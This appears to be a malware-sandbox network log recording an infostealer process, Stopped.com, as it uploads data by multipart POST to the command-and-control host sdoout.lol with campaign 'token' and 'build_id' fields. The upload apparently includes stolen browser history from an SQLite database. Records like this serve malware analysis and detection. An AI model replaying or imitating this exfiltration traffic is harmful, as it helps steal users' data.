2024-12-31 15:57:54 UTC	16355	OUT	Data Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54 Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
2024-12-31 15:57:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	51517	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:55 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----gln7qieuaaiwbi5pph47 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 66001 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:55 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 35 70 70 68 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 35 70 70 68 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 35 70 70 68 34 37 0d 0a 43 6f 6e 74 Data Ascii: ------gln7qieuaaiwbi5pph47Content-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------gln7qieuaaiwbi5pph47Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------gln7qieuaaiwbi5pph47Cont
2024-12-31 15:57:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:55 UTC	581	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	51518	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:56 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2dba1dbsrqq9zuasriwl User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 153381 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:56 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 64 62 61 31 64 62 73 72 71 71 39 7a 75 61 73 72 69 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 32 64 62 61 31 64 62 73 72 71 71 39 7a 75 61 73 72 69 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 32 64 62 61 31 64 62 73 72 71 71 39 7a 75 61 73 72 69 77 6c 0d 0a 43 6f 6e 74 Data Ascii: ------2dba1dbsrqq9zuasriwlContent-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------2dba1dbsrqq9zuasriwlContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------2dba1dbsrqq9zuasriwlCont
2024-12-31 15:57:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:56 UTC	6186	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	51519	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:57 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----p8900hvkx4wtjm7g4e3w User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:57 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 70 38 39 30 30 68 76 6b 78 34 77 74 6a 6d 37 67 34 65 33 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 70 38 39 30 30 68 76 6b 78 34 77 74 6a 6d 37 67 34 65 33 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 70 38 39 30 30 68 76 6b 78 34 77 74 6a 6d 37 67 34 65 33 77 0d 0a 43 6f 6e 74 Data Ascii: ------p8900hvkx4wtjm7g4e3wContent-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------p8900hvkx4wtjm7g4e3wContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------p8900hvkx4wtjm7g4e3wCont
